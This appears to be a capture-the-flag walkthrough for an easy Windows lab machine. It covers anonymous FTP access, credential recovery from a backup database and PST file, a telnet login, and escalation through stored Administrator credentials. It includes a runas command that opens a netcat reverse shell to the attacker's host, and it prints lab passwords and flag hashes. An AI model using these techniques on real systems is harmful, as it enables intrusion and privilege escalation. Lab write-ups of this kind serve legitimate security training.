Access logo

This is an easy windows box

Tools used


  • 7z
  • copy
  • ftp
  • less
  • nc
  • nmap
  • powerless
  • runas
  • smbserver
  • strings
  • telnet

Reconnaissance


Nmap

nmap -sC -sV -oA access 10.10.10.98 -v

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
| ftp-syst: 
|_  SYST: Windows_NT
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Here’s what nmap teaches us :

  • port 21 (FTP) - Anonymous login
  • port 23 (TELNET)
  • port 80 (HTTP) - IIS 7.5

Since I have anonymous access to the FTP, let’s use them :

ftp 10.10.10.98
Connected to 10.10.10.98.
220 Microsoft FTP Service
Name (10.10.10.98:liodeus): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
08-23-18  09:16PM       <DIR>          Backups
08-24-18  10:00PM       <DIR>          Engineer

There is two directories :

  • Backups
  • Engineer
ftp> cd Backups
ftp> ls
08-23-18  09:16PM              5652480 backup.mdb
ftp> get backup.mdb
ftp> cd Engineer
ftp> ls
08-24-18  01:16AM                10870 Access Control.zip
ftp> get "Access Control.zip"

I downloaded two files from the two directories :

  • backup.mdb
  • Access Control.zip

I tried to unzip the file but it’s protected by a password ! Maybe it’s in the backup.mdb, to check for that I used the command strings and I got throught the output line by line looking for something that look like a password :

strings backup.mdb | less
[...]
access4u@security
[...]

There was a lot of gibberish strings but one stands out : access4u@security, let’s try it as password for the protected zip :

7z e Access\ Control.zip 

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.utf8,Utf16=on,HugeFiles=on,64 bits,4 CPUs Intel(R) Core(TM) i7-9750H CPU @ 2.60GHz (906EA),ASM,AES-NI)

Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)

Extracting archive: Access Control.zip
--
Path = Access Control.zip
Type = zip
Physical Size = 10870

    
Enter password (will not be echoed):
Everything is Ok         

Size:       271360
Compressed: 10870

Nice that was the password ! I now have a file name “Access Control.pst”, looking on google how to open this file, I found this pst viewer who let you open it in the browser.

PST online

I now have credentials :

login = security
password = 4Cc3ssC0ntr0ller

But where do I use them ?

Go see the website :

Website

There is nothing here and what about the telnet port :

telnet 10.10.10.98                             
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service 

login:

Exploit


It’s asking for a login, let’s try them here :

telnet 10.10.10.98                             
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service 

login: security
password: 

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>whoami
access\security

I’m connected nice ! It’s time to enumerate, first launch a smbserver for file transfert :

sudo smbserver.py -smb2support liodeus ./

Then I used Powerless.bat, because .exe wouldn’t works :

\\10.10.14.4\liodeus\Powerless.bat

The interesting part is here :

-- Stored Passwords --

Currently stored credentials:
    Target: Domain:interactive=ACCESS\Administrator
                                                       Type: Domain Password
    User: ACCESS\Administrator

Nice the credentials of Administrator are stored, so I can use the command runas as him ! Let’s get a reverse shell as Administrator, first upload nc on the box :

copy \\10.10.14.4\liodeus\nc.exe .

Launch a nc listener :

nc -lvp 1234

Then run the command runas with the stored credentials :

runas /savecred /user:administrator "nc.exe -e cmd.exe 10.10.14.4 1234"

Go see the listener :

nc -lvp 1234
listening on [any] 1234 ...
10.10.10.98: inverse host lookup failed: Unknown host
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.98] 49168
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
access\administrator

Voila, I now have the Administrator rights and can read the flags.

Flags


User.txt

C:\Users\security\Desktop>type user.txt
ff1f3b48913b213a31ff6756d2553d38

Root.txt

C:\Users\Administrator\Desktop>type root.txt
type root.txt
6e1586cc7ab230a8d297e8f933d904cf